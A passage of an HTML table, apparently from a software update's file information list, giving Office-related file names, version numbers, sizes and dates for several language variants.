class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">transmrr.dll_3179</td><td class=\"sbody-td\">transmrr.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">16032</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">delimr.fae_1036</td><td class=\"sbody-td\">delimr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">10928</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">delimr.fae_1134</td><td class=\"sbody-td\">delimr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">10928</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">delimr.fae_1160</td><td class=\"sbody-td\">delimr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">10928</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">localdv.dll_1036</td><td class=\"sbody-td\">localdv.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">43168</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">localdv.dll_1134</td><td class=\"sbody-td\">localdv.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">43168</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">localdv.dll_1160</td><td class=\"sbody-td\">localdv.dll</td><td class=\"sbody-td\">15.0.4442.1000</td><td class=\"sbody-td\">43168</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">oladdr.fae_1036</td><td class=\"sbody-td\">oladdr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">15568</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">oladdr.fae_1134</td><td class=\"sbody-td\">oladdr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">15568</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">oladdr.fae_1160</td><td class=\"sbody-td\">oladdr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">15568</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">olapptr.fae_1036</td><td class=\"sbody-td\">olapptr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">12504</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">olapptr.fae_1134</td><td class=\"sbody-td\">olapptr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">12504</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">olapptr.fae_1160</td><td class=\"sbody-td\">olapptr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">12504</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">oljrnlr.fae_1036</td><td class=\"sbody-td\">oljrnlr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">10944</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">oljrnlr.fae_1134</td><td class=\"sbody-td\">oljrnlr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">10944</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">oljrnlr.fae_1160</td><td class=\"sbody-td\">oljrnlr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">10944</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">olmailr.fae_1036</td><td class=\"sbody-td\">olmailr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">10936</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">olmailr.fae_1134</td><td class=\"sbody-td\">olmailr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">10936</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">olmailr.fae_1160</td><td class=\"sbody-td\">olmailr.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">10936</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">olnoter.fae_1036</td><td class=\"sbody-td\">olnoter.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">10424</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">olnoter.fae_1134</td><td class=\"sbody-td\">olnoter.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">10424</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">olnoter.fae_1160</td><td class=\"sbody-td\">olnoter.fae</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">10424</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">olr.sam_1036</td><td class=\"sbody-td\">olr.sam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">14496</td><td class=\"sbody-td\">24-Aug-16</td><td class=\"sbody-td\">11:46</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">olr.sam_1134</td><td class=\"sbody-td\">olr.sam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">14496</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">olr.sam_1160</td><td class=\"sbody-td\">olr.sam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">14496</td><td class=\"sbody-td\"></td><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">oltaskr.fae_1036</td><td class=\"sbody-td\">oltaskr.fae</td><td class=\"sbody-td\">